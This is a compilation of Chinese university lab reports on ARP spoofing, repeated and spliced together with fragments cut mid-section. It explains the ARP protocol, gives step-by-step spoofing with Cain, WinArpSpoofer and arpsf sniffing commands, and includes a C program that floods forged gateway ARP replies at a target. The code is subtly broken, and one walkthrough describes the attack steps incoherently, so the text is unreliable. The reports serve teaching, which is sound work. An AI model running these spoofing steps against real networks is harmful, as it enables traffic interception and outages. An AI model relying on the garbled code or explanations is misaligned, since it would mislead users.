计算机网络安全实验arp欺骗
arp欺骗 实验报告
arp欺骗实验报告
ARP欺骗实验报告
在网络安全领域,ARP欺骗是一种常见的攻击手段,它利用ARP协议的漏洞来
欺骗网络设备,使其发送数据包到错误的目的地。
为了更好地了解ARP欺骗的
原理和影响,我们进行了一项实验。
实验步骤如下:
1. 准备工作:我们使用了一台路由器和两台电脑来搭建局域网环境。
其中一台
电脑作为攻击者,另一台电脑作为受害者。
2. ARP欺骗攻击:在攻击者电脑上,我们使用工具来发送伪造的ARP响应包,
将受害者电脑的IP地址映射到攻击者的MAC地址上。
3. 数据传输测试:在进行ARP欺骗攻击后,我们在受害者电脑上发送了一些数
据包,观察其传输情况。
实验结果如下:
1. 数据包丢失:在进行ARP欺骗攻击后,我们发现受害者电脑发送的数据包并
没有到达预期的目的地,而是被发送到了攻击者电脑上。
2. 网络混乱:由于ARP欺骗导致了数据包发送错误,整个局域网环境出现了混乱,部分数据包甚至丢失。
结论:
通过这次实验,我们深刻认识到ARP欺骗对网络的危害。
攻击者可以利用ARP
欺骗来窃取数据、监控通信内容甚至篡改数据,给网络安全带来了严重的威胁。
因此,我们呼吁网络管理员和用户加强对ARP欺骗攻击的防范意识,采取相应
的安全措施来保护网络安全。
同时,我们也希望厂商能够加强对ARP协议的安
全性设计,减少网络攻击的可能性。
ARP攻击实验报告
网络入侵实验报告学号:0867010077姓名:***一.实验目的:1、了解基本的网络攻击原理和攻击的主要步骤;2、掌握网络攻击的一般思路;3、了解arp攻击的主要原理和过程;二.实验原理:arp攻击就是通过伪造ip地址和mac地址实现arp欺骗,能够在网络中产生大量的arp通信量使网络阻塞,攻击者只要持续不断的发出伪造的arp响应包就能更改目标主机arp缓存中的ip-mac条目,造成网络中断或中间人攻击。
arp攻击主要是存在于局域网网络中,局域网中若有一台计算机感染arp木马,则感染该arp木马的系统将会试图通过“arp欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
某机器a要向主机b发送报文,会查询本地的arp缓存表,找到b的ip地址对应的mac地址后,就会进行数据传输。
如果未找到,则a广播一个arp请求报文(携带主机a的ip地址ia——物理地址pa),请求ip地址为ib的主机b回答物理地址pb。
网上所有主机包括b都收到arp请求,但只有主机b识别自己的ip地址,于是向a主机发回一个arp响应报文。
其中就包含有b的mac地址,a接收到b的应答后,就会更新本地的arp缓存。
接着使用这个mac地址发送数据(由网卡附加mac地址)。
因此,本地高速缓存的这个arp表是本地网络流通的基础,而且这个缓存是动态的。
本实验的主要目的是在局域网内,实施arp攻击,使局域网的网关失去作用,导致局域网内部主机无法与外网通信。
三.实验环境:windows xp操作系统,iris抓包软件四.实验步骤:1,安装iris,第一次运行iris后会出现一个要你对适配器的选择的界面,点击适配器类型,点击确定就可以了:如图1-1;图1-1 2对编辑过滤器进行设置(edit filter settings),设置成包含arp 如图1-2;图1-2 3.点击iris的运行按钮(那个绿色的按钮),或捕获(capture)按钮。
arp欺骗实验报告
arp欺骗实验报告
ARP欺骗实验报告
在网络安全领域,ARP欺骗是一种常见的攻击手段,用于窃取网络通信数据或
者对网络进行破坏。
为了更好地了解ARP欺骗的原理和危害,我们进行了一系
列的ARP欺骗实验。
实验一:ARP欺骗原理
首先,我们对ARP协议进行了深入的研究,了解了ARP欺骗的原理。
ARP协议是用于将IP地址映射到MAC地址的协议,而ARP欺骗则是指攻击者发送虚假
的ARP响应,欺骗目标主机将其通信数据发送到攻击者的机器上,从而实现窃
取数据或者中间人攻击的目的。
实验二:ARP欺骗的危害
在实验中,我们模拟了一次ARP欺骗攻击,并观察了其对网络的影响。
我们发现,一旦发生ARP欺骗,目标主机会将其通信数据发送到攻击者的机器上,导
致数据泄露和网络通信的混乱。
此外,ARP欺骗还可能导致网络中断或者恶意
软件的传播,给网络安全带来严重的威胁。
实验三:防范ARP欺骗的方法
为了防范ARP欺骗攻击,我们测试了一些常见的防御方法,包括静态ARP绑定、ARP监控和网络流量分析等。
我们发现,这些方法可以有效地防止ARP欺骗攻击,保护网络通信的安全和稳定。
总结:ARP欺骗是一种常见的网络攻击手段,具有严重的危害。
通过本次实验,我们更加深入地了解了ARP欺骗的原理和危害,以及防范ARP欺骗的方法,为网络安全的保护提供了重要的参考和指导。
希望我们的实验报告能够对网络安
全研究和实践提供有益的启示。
网络安全实验报告 - ARP欺骗
首先使用“快照X”恢复Windows/Linux系统环境。
一.ARP欺骗攻击实验需求:(1)本实验使用交换网络结构(参见附录B),组一、二和三间通过交换模块连接(主机A、C、E通过交换模块连接,主机B、D、F也通过交换模块连接)。
因此,正常情况下,主机C无法以嗅探方式监听到主机A与主机E间通信数据,同样主机D也无法监听到主机B与主机F间的通信数据。
(2)主机C要监听主机A和主机E间的通信数据;主机D要监听主机B与主机F间的通信数据。
分析:黑客主机通过对目标主机进行ARP欺骗攻击,获取目标主机间的通信数据。
1.正常通信(1)目标主机二单击工具栏“UDP工具”按钮,启动UDP连接工具,创建2513/udp服务端。
(2)目标主机一启动UDP连接工具,将“目标机器”IP地址指定为目标主机二的地址,目标端口与服务器一致。
在“数据”文本框中输入任意内容,单击“发送”按钮,向服务端发送数据。
服务端确定接收到数据。
(3)黑客主机单击工具栏“控制台”按钮,切换至/opt/ExpNIS/NetAD-Lab/Tools/ids/目录(Snort目录),执行如下命令:通过上述命令snort仅会监听源IP地址为目标主机一的、传输协议类型为UDP的网络数据(4)目标主机一再次向目标主机二发送消息,黑客主机停止snort监听(Ctrl+C),观察snort监听结果,是否监听到目标主机间的通信数据。
为什么?没有监听到结果,目标主机不在同一个共享设备上,正常状态下目标主机一和二间的通信,黑客主机监听不到它们之间的信息。
(5)目标主机一查看ARP缓存表,确定与目标主机二的IP相映射的MAC 地址是否正常。
不正常,缓存表多出一行新的内容。
2.ARP攻击(1)黑客主机单击平台工具栏“控制台”按钮,进入实验目录,运行ARPattack 程序攻击目标主机一,将其ARP缓存表中与目标主机二相映射的MAC地址更改为黑客主机的MAC地址。
其中第一个参数为被攻击主机IP地址,第二个参数为被攻击主机MAC地址,第三个参数为与被攻击主机进行正常通信的主机IP地址。
电子科技大学实验报告
图4-19
说明:由于cain功能很多,此处仅对本实验中所用到的功能进行讲解,其余功能读者可以自己去了解、尝试。
2.绑定网卡
在IP地址为192.168.1.12的机器上运行cain,在cain运行界面上,按下“sniffer”图标,并点击“configuration菜单”,在“sniffer”选项卡下,选择恰当的网卡进行绑定,点击确定。如图4-20、图4-21
1.安装使用工具Cain
首先在局域网内某台机器上安装Cain(IP地址为192.168.1.12)。Cain是一个功能强大的软件,可以实现网络嗅探、网络欺骗、破解加密口令、分析路由协议等功能。使用它之前必须进行安装,安装过程只需要按照默认情况安装即可。双击“Cain v2.5”,运行Cain的操作界面如图4-19:
六、实验内容:
1.安装使用工具Cain。
实验四实现ARP欺骗
实验四实现ARP欺骗ARP(Address Resolution Protocol)是一种用于解析IP地址和MAC地址之间映射的网络协议。
在一个局域网中,每台主机都维护一张ARP缓存表,用于保存IP地址和MAC地址的对应关系。
当主机需要发送数据到另一台主机时,会首先查询ARP缓存表,如果找到了对应的MAC地址,则直接将数据发送给该MAC地址;如果没有找到对应的MAC地址,则会发送ARP请求包,询问其他主机的MAC地址。
其他主机收到ARP请求时,会回复ARP响应包,告诉发送主机自己的MAC地址。
ARP欺骗是一种网络攻击技术,攻击者通过伪装成网络中其他设备的MAC地址,欺骗其他设备发送数据给攻击者,从而拦截、修改或者篡改通信数据。
ARP欺骗可以用于中间人攻击、数据嗅探、劫持等恶意行为。
为了实现ARP欺骗,需要具备以下条件和步骤:1.首先,攻击者需要在目标局域网中与被欺骗的主机处于同一个子网中,以便可以直接发送ARP请求和响应。
2. 攻击者需要具备截获、修改和发送网络数据包的能力。
可以使用一些工具如Ettercap、Cain & Abel等来实现。
3.攻击者需要了解被欺骗主机的IP地址和MAC地址,并且可以伪装成该主机的MAC地址。
下面是具体的步骤:1.攻击者首先需要将自己的电脑配置为网关的IP地址,这样所有经过网关的数据包都会被发送到攻击者的电脑。
2.攻击者发送一个ARP请求包,询问目标主机的MAC地址。
ARP请求包中会包含攻击者伪装成被欺骗主机的IP地址和MAC地址。
3.被欺骗主机收到ARP请求包后,会查询自己的ARP缓存表,发现有针对该IP地址的条目但没有对应的MAC地址。
于是它会向攻击者发送一个ARP响应包,告诉攻击者自己的MAC地址。
4.攻击者收到ARP响应包后,会更新自己的ARP缓存表,将被欺骗主机的IP地址和MAC地址映射关系存入其中。
5.攻击者可以修改或拦截网络数据包,并通过伪造源MAC地址和目标MAC地址发送数据包。
arp欺骗 实验报告
arp欺骗实验报告ARP欺骗实验报告引言ARP(地址解析协议)是用于将IP地址映射到MAC地址的协议,它在局域网中起着至关重要的作用。
然而,由于其工作机制的特性,ARP协议也容易受到欺骗攻击的影响。
本实验旨在通过模拟ARP欺骗攻击,探究其对网络安全的影响。
实验设计本次实验使用了一台路由器和两台计算机,它们分别连接在同一个局域网中。
其中一台计算机作为攻击者,另一台计算机作为受害者。
攻击者使用工具对受害者进行ARP欺骗攻击,将受害者的IP地址映射到自己的MAC地址上,从而实现对受害者的网络流量窃取或篡改。
实验过程在实验开始之前,我们首先使用Wireshark网络抓包工具监控局域网中的数据流量。
然后攻击者使用工具发送伪造的ARP响应包,将受害者的IP地址映射到自己的MAC地址上。
接着,我们再次通过Wireshark监控数据流量,观察受害者的网络通信是否受到影响。
实验结果通过实验我们发现,一旦受害者的ARP缓存表被攻击者篡改,受害者将无法正常与其他设备进行通信。
攻击者可以窃取受害者的数据流量,或者将受害者的流量重定向到自己的设备上进行篡改。
这对于网络安全来说是一个严重的威胁,可能导致机密信息泄露或者网络服务受到破坏。
结论ARP欺骗攻击是一种常见的网络安全威胁,它可以对局域网中的设备造成严重影响。
为了防范这种攻击,网络管理员需要采取一系列措施,包括加强网络设备的安全设置、定期清理ARP缓存表、使用加密通信协议等。
同时,网络设备厂商也应该加强对ARP协议的安全性设计,以提高网络的整体安全性。
通过本次实验,我们对ARP欺骗攻击有了更深入的了解,也更加意识到了网络安全的重要性。
计算机网络安全实验——arp欺骗
《计算机网络安全》实验报告实验名称: arp欺骗提交报告时间:年月日一、实验目的程序实现ARP欺骗,对ARP欺骗进行进一步的认识并提出防范措施。
二、系统环境主机1 windows系统主机2 windows系统主机3 linux操作系统三、网络环境同一网段下的网络四、实验步骤与实验结果将主机A、C、E为一组,B、D、F为一组。
实验角色说明如下:实验主机实验角色主机A、B 目标主机一/Windows主机C、D 黑客主机/Linux主机E、F 目标主机二/Windows首先使用“快照X”恢复Windows/Linux系统环境。
一.ARP欺骗攻击实验需求:(1)本实验使用交换网络结构(参见附录B),组一、二和三间通过交换模块连接(主机A、C、E通过交换模块连接,主机B、D、F也通过交换模块连接)。
因此,正常情况下,主机C无法以嗅探方式监听到主机A与主机E间通信数据,同样主机D也无法监听到主机B与主机F间的通信数据。
(2)主机C要监听主机A和主机E间的通信数据;主机D要监听主机B与主机F间的通信数据。
分析:黑客主机通过对目标主机进行ARP欺骗攻击,获取目标主机间的通信数据。
1.正常通信图6-1-1 目标主机正常通信示意图(1)目标主机二单击工具栏“UDP工具”按钮,启动UDP连接工具,创建2513/udp服务端。
主机1发送数据(2)目标主机一启动UDP连接工具,将“目标机器”IP地址指定为目标主机二的地址,目标端口与服务器一致。
在“数据”文本框中输入任意内容,单击“发送”按钮,向服务端发数据。
服务端确定接收到数据。
主机2接收到数据(3)黑客主机单击工具栏“控制台”按钮,切换至/opt/ExpNIC/NetAD-Lab/Tools/ids 目录(Snort目录),命令如下:主机3通过上述命令snort仅会监听源IP地址为目标主机一的、传输协议类型为UDP的网络数据(详细的snort使用命令见实验10|练习一)。
实现ARP欺骗实验报告
实现ARP欺骗实验报告实验目的:掌握ARP欺骗的原理和技术,并通过实验加深对ARP欺骗攻击的理解。
实验原理:地址解析协议(ARP)是一种用于在局域网中将IP地址映射到物理地址的协议。
ARP欺骗是一种利用ARP协议的漏洞进行的攻击,攻击者通过伪造ARP响应包,将目标IP地址与攻击者的MAC地址进行绑定,从而达到窃取数据、中间人攻击等目的。
ARP欺骗的基本原理是攻击者发送伪造的ARP响应包给局域网中的其他设备,要求将目标IP地址的MAC地址更新为攻击者的MAC地址,从而使得目标设备将数据发送给攻击者,从而实现数据窃取和中间人攻击。
实验材料:1.两台计算机;2.一台路由器;3. ARP欺骗工具(如Cain & Abel)。
实验步骤:1.将两台计算机和一台路由器连接到同一个局域网中。
2.在计算机A上运行ARP欺骗工具,设置攻击者的IP地址、目标IP地址和攻击者的MAC地址。
3. 在计算机B上运行网络监控工具,例如Wireshark,以便监控网络流量和检测ARP欺骗攻击。
4.在计算机A上发送ARP欺骗攻击,向局域网中的所有设备发送伪造的ARP响应包,将目标IP地址的MAC地址更新为攻击者的MAC地址。
5.监控计算机B上的网络流量,观察是否发现异常情况,例如数据包被攻击者拦截、中间人攻击等。
6.完成实验后,及时恢复网络环境,确保网络安全。
实验结果:通过实验,我们成功实现了ARP欺骗攻击。
攻击者发送的伪造ARP响应包成功地将目标IP地址的MAC地址更新为攻击者的MAC地址,并成功拦截了计算机B的网络流量。
通过网络监控工具,我们观察到了异常的网络行为,确认了ARP欺骗攻击的存在。
实验总结:ARP欺骗是一种常见的安全漏洞,攻击者通过伪造ARP响应包进行攻击,容易导致数据被窃取和中间人攻击。
为了保护网络安全,我们应该采取相应的防护措施,例如使用静态ARP表、启用交换机上的ARP验证功能、使用网络流量监控工具等。
arp攻击和欺骗实验文档
Arp攻击和欺骗实验实验要求:1.打开三台虚拟机,win XP(192.168.1.1),2003(192.168.1.2),win7 (192.168.1.3)各一台2.通过在win7上安装winshark抓包分析工具,分析局域网中ARP攻击和欺骗,并找到攻击源Wireshark的界面选择要分析的网卡接口测试192.168.1.2ping192.168.1.1,分析测试包分析:二层数据帧中的源mac地址是8b:c2(192.168.1.2)目的mac地址为79:c8(192.168.1.1)上层封装的协议为ip协议,三层数据包使用的是ipv4,头部长度为20字节,总长度为60字节,TTL值为128,使用的协议是icmp协议,是一个请求包(1)。
3.在2003上安装arp攻击工具,制造arp攻击现象,结合捕获数据包分析arp攻击原理(要求有分析文字)4.使用长角牛网络监控机(网络执行法官)添加要指定的ip范围(指定的ip范围不idingshi监控卡所处的网段,只要是监控主机可以访问到得局域网均可监控)自动搜索到的主机点中要攻击的主机然后右击—手工管理—选择管理方式—开始进行对192.168.1.1arp 攻击测试192.168.1.1是否能够ping通192.168.1.2,同时开启wireshare进行抓包分析从图中分析得到:抓到的是一个arp包,实际是79:c8(1.1)ping8b:c2(1.2),但是3a:0d(1.3)发送给192.168.1.1一个arp应答告诉192.168.1.2的mac地址是6e:82(虚假mac地址),使用的是arp攻击。
使得192.168.1.1无法与192.168.1.2通信。
操作代码为2(应答包),三层的协议类型为ip协议。
5.在2003上安装arp欺骗工具,制造arp欺骗现象,结合捕获数据包,分析arp欺骗原理(要求有文字分析)安装arp欺骗工具添加选项搜索主机开始进行192.168.1.2和192.168.1.1放毒欺骗与arp攻击不同的是,进行arp欺骗不会导致无法访问网络,而是通过冒充网关或其他主机使到达网关或主机的流量通过攻击主机进行转发,通过转发流量可以对流量进行控制和查看,从而控制流量或得到机密信息。
arp欺骗实验报告
arp欺骗实验报告ARP欺骗实验报告引言:ARP(Address Resolution Protocol)是计算机网络中的一种协议,用于将IP地址转换为物理地址(MAC地址)。
ARP欺骗是一种网络攻击技术,攻击者通过伪造ARP响应包来欺骗网络中的主机,使其将数据发送到攻击者控制的设备上。
本实验旨在研究ARP欺骗的原理、方法以及对网络的影响。
实验目的:1. 研究ARP欺骗的原理和工作机制。
2. 实际操作ARP欺骗攻击,并观察其对网络的影响。
3. 探讨防范ARP欺骗的方法。
实验步骤:1. 搭建实验环境:使用两台计算机,一台作为攻击者,一台作为受害者。
两台计算机连接到同一个局域网中。
2. 配置网络设置:攻击者计算机启用IP转发功能,确保可以转发受害者的数据包。
3. 获取网络信息:攻击者计算机使用ARP协议获取受害者计算机的IP地址和MAC地址。
4. 发送伪造ARP响应包:攻击者计算机发送伪造的ARP响应包,将受害者的IP 地址与攻击者的MAC地址进行映射。
5. 受害者响应:受害者计算机接收到伪造的ARP响应包后,将其缓存到ARP缓存表中。
6. 数据重定向:攻击者计算机将受害者的数据包转发到目标设备,同时将目标设备的响应数据包转发给受害者,实现数据重定向。
7. 观察网络影响:观察受害者计算机的网络连接是否受到干扰,网络速度是否下降。
实验结果与分析:在实验中,我们成功进行了ARP欺骗攻击,并观察到以下结果:1. 受害者计算机的网络连接受到干扰:受害者计算机无法正常访问互联网,网络速度明显下降。
2. 攻击者计算机能够获取受害者的数据包:攻击者计算机能够成功转发受害者的数据包,并获取目标设备的响应数据包。
3. 网络通信异常:由于攻击者计算机作为中间人拦截了受害者和目标设备之间的通信,网络通信变得异常不稳定。
ARP欺骗攻击的原理是通过伪造ARP响应包,将受害者的IP地址与攻击者的MAC地址进行映射,使得受害者将数据发送到攻击者控制的设备上。
欺骗攻击及防御技术实验-局域网ARP攻击
我们以主机a(192.168.1.5)向主机b(192.168.1.1)发送数据为例。
当发送数据时,主机a会在自己的arp缓存表中寻找是否有目标ip地址。
如果找到了,也就知道了目标mac地址,直接把目标mac地址写入帧里面发送就可以了;如果在arp缓存表中没有找到相对应的ip地址,主机a就会在网络上发送一个广播,目标mac地址是“ff.ff.ff.ff.ff.ff”,这表示向同一网段内的所有主机发出这样的询问:“192.168.1.1的mac地址是什么?”网络上其他主机并不响应arp询问,只有主机b接收到这个帧时,才向主机a做出这样的回应:“192.168.1.1的mac地址是00-aa-00-62-c6-09”。
这样,主机a就知道了主机b的mac地址,它就可以向主机b发送信息了。
同时它还更新了自己的arp缓存表,下次再向主机b发送信息时,直接从arp缓存表里查找就可以了。
arp缓存表采用了老化机制,在一段时间内如果表中的某一行没有使用,就会被删除,这样可以大大减少arp缓存表的长度,加快查询速度。
arp攻击就是通过伪造ip地址和mac地址实现arp欺骗,能够在网络中产生大量的arp通信量使网络阻塞,攻击者只要持续不断的发出伪造的arp响应包就能更改目标主机arp缓存中的ip-mac 条目,造成网络中断或中间人攻击。
arp攻击主要是存在于局域网网络中,局域网中若有一个人感染arp木马,则感染该arp木马的系统将会试图通过“arp欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
从影响网络连接通畅的方式来看,arp欺骗分为二种,一种是对路由器arp表的欺骗;另一种是对内网pc的网关欺骗。
第一种arp欺骗的原理是——截获网关数据。
它通知路由器一系列错误的内网mac地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的mac地址,造成正常pc无法收到信息。
电子科技大学实验报告
2.绑定网卡
在IP地址为的机器上运行cain,在cain运行界面上,按下“sniffer”图标,并点击“configuration菜单”,在“sniffer”选项卡下,选择恰当的网卡进行绑定,点击确定。如图4Biblioteka 20、图4-21图4-24
图4-25
说明:若没有选择 图标,则当点击 时,会提示“sniffer not be actived”,此时点击 ,开始嗅探,实验仍可继续进行。从cain主界面中可以看到,已探测出在该区域段的机器(10.11为主机,13为虚拟主机,1为网关)。如图4-26
图4-26
4.ARP欺骗
选择cain主界面下端的APR标签 ,点击“ ”号,在选项框中选择进行ARP欺骗的地址。左边选择被欺骗的主机,再在右边选择合适的主机(或网关),ARP能够在左边列表中被选的主机和所有在右边选中的主机之间双向劫持IP包。在该实验中首先在左侧列表中选择的地址,然后右侧列表即会出现其他IP地址,若在右侧选择网关,这样就可以截获所有从13发出到广域网的数据包信息。点击“OK”,在cain界面上可以看到形成的欺骗列表,此时在状态一栏中显示“idle”,开始欺骗点击工具栏上的“ ”状态变为“poisoning”,开始捕获。此时,在机器上进行网络操作,在12机器上会看到cain界面上显示捕获数据包的增加。如图4-27、图4-28、图4-29、图4-30
1.安装使用工具Cain
首先在局域网内某台机器上安装Cain(IP地址为)。Cain是一个功能强大的软件,可以实现网络嗅探、网络欺骗、破解加密口令、分析路由协议等功能。使用它之前必须进行安装,安装过程只需要按照默认情况安装即可。双击“Cain v2.5”,运行Cain的操作界面如图4-19:
工程实验室_ARP检查防ARP欺骗
实验16 配置ARP检查【实验名称】配置ARP检查。
【实验目的】使用交换机的ARP检查功能,防止ARP欺骗攻击。
【背景描述】某企业的网络管理员发现最近经常有员工抱怨无法访问互联网,经过故障排查后,发现客户端PC上缓存网关的ARP绑定条目是错误的,从该现象可以判断网络中可能出现了ARP欺骗攻击,导致客户端PC不能获取正确的ARP条目,以至不能够访问外部网络。
【需求分析】ARP欺骗攻击是目前内部网络出现的最频繁的一种攻击。
对于这种攻击,需要检查网络中ARP报文的合法性。
交换机的ARP检查功能可以满足这个要求,防止ARP欺骗攻击。
【实验拓扑】实验的拓扑图,如图16-1所示。
图16-1【实验设备】交换机1台PC机2台(其中一台需要安装ARP欺骗攻击工具WinArpSpoofer(测试用)路由器1台(作为网关)【预备知识】交换机转发原理、交换机基本配置、ARP欺骗原理、ARP检查原理。
实验16 配置ARP 检查 ·2·【实验原理】交换机的ARP 检查功能,可以检查端口收到的ARP 报文的合法性,并可以丢弃非法的ARP 报文,防止ARP 欺骗攻击。
【实验步骤】步骤1 配置IP 地址,测试网络连通性。
按照拓扑图正确配置PC 机、攻击机、路由器的IP 地址,使用ping 命令验证设备之间的连通性,保证可以互通。
查看PC 机本地的ARP 缓存,ARP 表中存有正确的网关的IP 与MAC 地址绑定,如图16-2所示。
图16-2步骤2 在攻击机上运行WinArpSpoofer 软件后,界面如图16-3所示。
图16-3在“Adapter ”选项卡中,选择正确的网卡后,WinArpSpoofer 会显示网卡的IP 地址、掩码、实验16 配置ARP 检查 ·3·网关、MAC 地址以及网关的MAC 地址信息。
步骤3 在WinArpSpoofer 界面中选择“Spoofing ”标签,打开“Spoofing ”选项卡界面如图16-4所示。
ARP欺骗实验报告
ARP欺骗实验报告四川大学软件学院实验报告课程名称网络安全产品开发实践II 实验课时2课时实验项目ARP 欺骗实验时间第3周实验目的1.在命令行下指定要欺骗的IP地址;2.判断指定的机器是否开启;3.如果对方的机器开启,向指定的IP地址主机持续发送目的IP地址为网关IP地址的欺骗ARP响应包;实验环境虚拟机:VMware Workstation 7.0 目标操作系统:RedFlag 7.0实验内容(算法、程序、步骤和方法)一、扫描程序代码:arp.c#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#includeunsigned char my_ip[4] = {159, 254, 26, 240};unsigned char gateway_ip[4] = {159, 254,0, 1};unsigned char my_mac[6] = {0x00,0x0c,0x29,0x43,0x26,0x42}; unsigned char att_ip[4];unsigned char attack_ip[15];struct arp_packet {struct ether_header eh;struct ether_arp arp;};struct sockaddr_in target;int sockfd;void getHost(){memset(attack_ip, 0 ,15);fprintf(stdout,"杈撳叆鏀诲嚮IP>");gets(attack_ip);//printf("%s\n", attack_ip);}int checkHost(char *ip){char temp[100];memset(temp, 0, 100);strcpy(temp, "ping -c2 ");strcat(temp, ip);if(!system(temp)){printf("\n%s(%s)%s\n", "Host", ip, " is open.");return 1;}else{printf("\n%s(%s)%s\n", "Host", ip, " is close.");return 0;}}void changeIP(char* ip){att_ip[0] = *strtok(ip, ".");att_ip[1] = *strtok(ip, ".");att_ip[2] = *strtok(ip, ".");att_ip[3] = *strtok(ip, ".");}void send_arp(char *attack_ip){unsigned broad_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; struct arp_packet arp_p;memcpy(arp_p.eh.ether_dhost, broad_mac, 6); memcpy(arp_p.eh.ether_shost, my_mac, 6);arp_p.eh.ether_type = ETHERTYPE_ARP;arp_p.arp.ea_hdr.ar_hrd = ARPHRD_ETHER;arp_p.arp.ea_hdr.ar_pro = ETHERTYPE_IP;arp_p.arp.ea_hdr.ar_hln = 6;arp_p.arp.ea_hdr.ar_pln = 4;arp_p.arp.ea_hdr.ar_op = ARPOP_REPLY;memcpy(arp_p.arp.arp_sha, my_mac, 6);memcpy(arp_p.arp.arp_spa, gateway_ip, 4);memcpy(arp_p.arp.arp_tha, broad_mac, 6);memcpy(arp_p.arp.arp_tpa, attack_ip, 4);printf("\n============================startattack!========================\n\n");int i=0;while(i<10 ){if(-1 != sendto(sockfd, &arp_p, sizeof(arp_p), 0, (struct sockaddr*)&target, sizeof(target)))printf("success send arp pcaket to %s\n", attack_ip); i++;}}int main(int argc, char *argv[]){getHost();if(checkHost(attack_ip)){sockfd = socket(AF_INET, SOCK_RAW, ETH_P_ARP);if(sockfd == -1)perror("socket()");memset(&target, 0, sizeof(target));target.sin_family = AF_INET;target.sin_port = 0;target.sin_addr.s_addr = inet_addr(attack_ip);send_arp(attack_ip);return 0;}elsereturn 0;}(接上)实验内容(算法、程序、步骤和方法)二、扫描结果截图:目标主机开启:目标主机不可达:数据记录和计算结果(一部分):Host(169.254.119.34) is open.=========================start attack!======================== success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34success send arp pcaket to 169.254.119.34结论(结果)初步实现arp欺骗。
信息安全实验报告
信息安全实验报告————————————————————————————————作者:————————————————————————————————日期:ﻩ信息安全基础实验报告姓名:田廷魁学号:2 班级:网工1201班ARP欺骗工具及原理分析(Sniffer网络嗅探器)一.实验目的和要求实验目的:1.熟悉ARP欺骗攻击有哪些方法。
2.了解ARP欺骗防范工具的使用。
3.掌握ARP欺骗攻击的实验原理。
实验要求:下载相关工具和软件包(ARP攻击检测工具,局域网终结者,网络执法官,ARPsniffer嗅探工具)。
二.实验环境(实验所用的软硬件)ARP攻击检测工具局域网终结者ﻫ网络执法官ARPsniffer嗅探工具三.实验原理ARP(AddressResolutionProtocol)即地址解析协议,是一种将IP地址转化成物理地址的协议。
不管网络层使用什么协议,在网络链路上传送数据帧时,最终还是必须使用硬件地址的。
而每台机器的MAC地址都是不一样的,具有全球唯一性,因此可以作为一台主机或网络设备的标识。
目标主机的MAC地址就是通过ARP协议获得的。
ARP欺骗原理则是通过发送欺骗性的ARP数据包致使接收者收到数据包后更新其ARP缓存表,从而建立错误的IP与MAC对应关系,源主机发送数据时数据便不能被正确地址接收。
四.实验内容与步骤1、利用ARPsniffer嗅探数据实验须先安装winpcap.exe它是arpsniffer.exe运行的条件,接着在arp sniffer.exe同一文件夹下新建记事本,输入Start cmd.exe ,保存为cmd.bat。
ARPsniffer有很多种欺骗方式,下面的例子是其中的一种。
安装截图:步骤一:运行cmd.exe,依次输入以下命令:"arpsf.exe-sniffall-o f:\sniffer.txt -g192.168.137.1 -t 192.168.137.5"(其中IP地址:192.168.137.1是局域网网关的地址,192.168.137.5是被欺骗主机的IP地址,试验获取的数据将会被输入到F盘的sniff er.txt文件中。
arp欺骗 实验报告
arp欺骗实验报告ARP欺骗实验报告引言:ARP(Address Resolution Protocol)是一种用于将IP地址映射到物理MAC地址的协议。
然而,这种协议存在一定的安全隐患,即ARP欺骗。
本实验旨在通过ARP欺骗实验,探究其原理和可能的应用。
实验目的:1. 了解ARP欺骗的基本原理;2. 探究ARP欺骗的可能应用场景;3. 分析ARP欺骗对网络安全的威胁;4. 提出相应的防范策略。
实验过程:1. 实验环境准备:为了模拟真实网络环境,我们搭建了一个局域网,包括一台路由器和两台主机。
其中,路由器的IP地址为192.168.1.1,主机A的IP地址为192.168.1.2,主机B的IP地址为192.168.1.3。
2. ARP欺骗实验:我们使用工具ARPspoof来进行ARP欺骗实验。
首先,我们在主机A上运行ARPspoof,将主机A伪装成路由器,向主机B发送虚假的ARP响应,将主机B 的IP地址映射到主机A的MAC地址上。
这样,主机B在发送数据包时,会将数据包发送到主机A,从而实现了ARP欺骗。
3. 实验结果分析:在ARP欺骗成功后,我们通过抓包工具Wireshark来捕获网络数据包。
发现主机B发送的数据包都被主机A接收到了,而路由器并没有收到主机B的数据包。
这说明ARP欺骗成功地将主机B的数据流量重定向到了主机A。
此外,我们还观察到主机A与主机B之间的通信变得异常缓慢,甚至出现了数据丢失的情况。
这是因为主机A作为中间人,需要将主机B发送的数据包进行转发,增加了网络延迟,并且可能导致数据包的丢失。
4. ARP欺骗的应用场景:ARP欺骗可以被恶意攻击者用于各种不法用途。
以下是一些可能的应用场景: a. 中间人攻击:攻击者可以将自己伪装成路由器,窃取网络通信中的敏感信息,如账号密码等。
b. 会话劫持:攻击者可以截获网络通信中的会话信息,进而劫持用户的登录状态,进行非法操作。
c. 拒绝服务攻击:攻击者可以通过ARP欺骗,将目标主机的流量重定向到其他地方,导致目标主机无法正常访问网络。
ARP欺骗
ARP欺骗【实验原理】ARP欺骗是黑客常用的攻击手段之一,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。
它通知路由器一系列错误的内网MAC 地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。
第二种ARP 欺骗的原理是——伪造网关。
它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。
在PC看来,就是上不了网了,“网络掉线了”。
ARP表是IP地址和MAC地址的映射关系表,任何实现了IP协议栈的设备,一般情况下都通过该表维护IP地址和MAC地址的对应关系,这是为了避免ARP解析而造成的广播数据报文对网络造成冲击。
ARP表的建立一般情况下是通过二个途径:(1)主动解析如果一台计算机想与另外一台不知道MAC地址的计算机通信,则该计算机主动发ARP 请求,通过ARP协议建立(前提是这两台计算机位于同一个IP子网上)。
(2)被动请求如果一台计算机接收到了一台计算机的ARP请求,则首先在本地建立请求计算机的IP 地址和MAC地址的对应表。
因此,针对ARP表项,一个可能的攻击就是误导计算机建立正确的ARP表。
